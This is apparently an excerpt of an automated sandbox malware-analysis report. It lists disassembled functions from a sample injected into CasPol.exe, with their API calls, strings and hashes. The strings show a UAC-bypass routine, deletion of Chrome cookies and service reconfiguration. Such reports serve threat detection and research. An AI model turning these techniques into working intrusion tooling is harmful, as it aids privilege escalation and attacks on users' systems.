                                                                                                                                                                                                                                  • Opcode ID: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                  • Instruction ID: 42fd6e2f6c8fd24065b669452523f428359482c8d7ddecb3c68a8dbe90369287
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E012836609B2A6EF31197749CC9F2B26D8DB457F1B30022AF928850F8FE115C475150
                                                                                                                                                                                                                                  Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                                                                                                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                                                  • API String ID: 3851391207-2637227304
                                                                                                                                                                                                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                                  Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                  • String ID: H]G
                                                                                                                                                                                                                                  • API String ID: 2536120697-1717957184
                                                                                                                                                                                                                                  • Opcode ID: 831260e2e50258e734e800f671c2e221e985db4fe4157639c37b4271b6a7a30d
                                                                                                                                                                                                                                  • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 831260e2e50258e734e800f671c2e221e985db4fe4157639c37b4271b6a7a30d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                                                                                                                  Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                  • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                  • Opcode ID: 83418db9db8d519c039b1a05c5cc056cc5f53273bb6f80aec581b2d4f8100a24
                                                                                                                                                                                                                                  • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83418db9db8d519c039b1a05c5cc056cc5f53273bb6f80aec581b2d4f8100a24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                                                                                                                  Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-EC111K$BG
                                                                                                                                                                                                                                  • API String ID: 0-200129539
                                                                                                                                                                                                                                  • Opcode ID: f596dccec36ba2edb01e8497e1ae222ff2b81d3db646b198ce2a52f1bf770b1f
                                                                                                                                                                                                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f596dccec36ba2edb01e8497e1ae222ff2b81d3db646b198ce2a52f1bf770b1f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                                  Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                  • String ID: Alarm triggered$`Wu
                                                                                                                                                                                                                                  • API String ID: 614609389-1738255680
                                                                                                                                                                                                                                  • Opcode ID: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
                                                                                                                                                                                                                                  • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                                                                                                                  Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00439789
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                  • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                  • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                                                                                                  Function 04578821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,04576FFD,00000000,?,?,?,04578A72,?,?,00000100), ref: 0457887B
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,04578A72,?,?,00000100,5EFC4D8B,?,?), ref: 04578901
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 045789FB
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A08
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A11
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A36
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: b6f146b5f655d2d647eb83cc3e161f4c28468681224a4fd87251e8876c73095e
                                                                                                                                                                                                                                  • Instruction ID: d25fbb7da888f26715dbf87edf3695ee0eef2f4bf4d06facd1cc7c889e16671a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6f146b5f655d2d647eb83cc3e161f4c28468681224a4fd87251e8876c73095e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B851B27261021AABEB25AE64FC48EBB77A9FF80764F154A39F804D6140FB34FC54E650
                                                                                                                                                                                                                                  Function 1001B1EE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B248
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B2CE
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1001B3C8
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 1001B3D5
                                                                                                                                                                                                                                    • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 1001B3DE
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 1001B403
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                  • Instruction ID: 2ed5a0c60fab733cb76eb0d012d0445d28864b3239f3e6487cb8682899a93c8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE51F372600A16ABEB15CFA4CC81EAF37E9EF44690F524229FD14DE180EB74EDD1C660
                                                                                                                                                                                                                                  Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                                  • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                                                                                                                  Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                  • API String ID: 3509577899-3206640213
                                                                                                                                                                                                                                  • Opcode ID: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                  • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                                                                                                                  Function 045715DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 04571607
                                                                                                                                                                                                                                  • _strcat.LIBCMT ref: 0457161D
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,0457190E,?,?,00000000,?,00000000), ref: 04571643
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 0457165A
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 04571661
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00001008,?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 04571686
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1922816806-0
                                                                                                                                                                                                                                  • Opcode ID: 757b7f7b6f64878c5d3fcfbc57e01019f39a198a556b658b858a93ce2cdcbbb5
                                                                                                                                                                                                                                  • Instruction ID: 22e0d8615fdaffd69c407aa0ae27b7eacf0633cae6d51130fe388283523fad94
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 757b7f7b6f64878c5d3fcfbc57e01019f39a198a556b658b858a93ce2cdcbbb5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21C836900204ABD704AB54FC84EEE77B8FF89714F14403AE504AB241EB34B945A7A5
                                                                                                                                                                                                                                  Function 04571000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 04571038
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0457104B
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 04571061
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 04571075
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 04571090
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 045710B8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3594823470-0
                                                                                                                                                                                                                                  • Opcode ID: a1f246a52a1322b1d1b839036d91bc99927e8f5025ac7d42a48c6ca691976ddb
                                                                                                                                                                                                                                  • Instruction ID: 1c57e1281a86ed6b1a91a35061e716d5b883dd80d5cdeeaf912082d4f0d0fb74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1f246a52a1322b1d1b839036d91bc99927e8f5025ac7d42a48c6ca691976ddb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB2141359006299BDF20EE64FC48DDB3779FF84318F1045A6E855972A1EE30EA89DB50
                                                                                                                                                                                                                                  Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 493672254-0
                                                                                                                                                                                                                                  • Opcode ID: a2f105e535d183d5d78deb6f7d5fe7bea4f0d81e54f61eac1a98da6bf8b63e62
                                                                                                                                                                                                                                  • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2f105e535d183d5d78deb6f7d5fe7bea4f0d81e54f61eac1a98da6bf8b63e62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
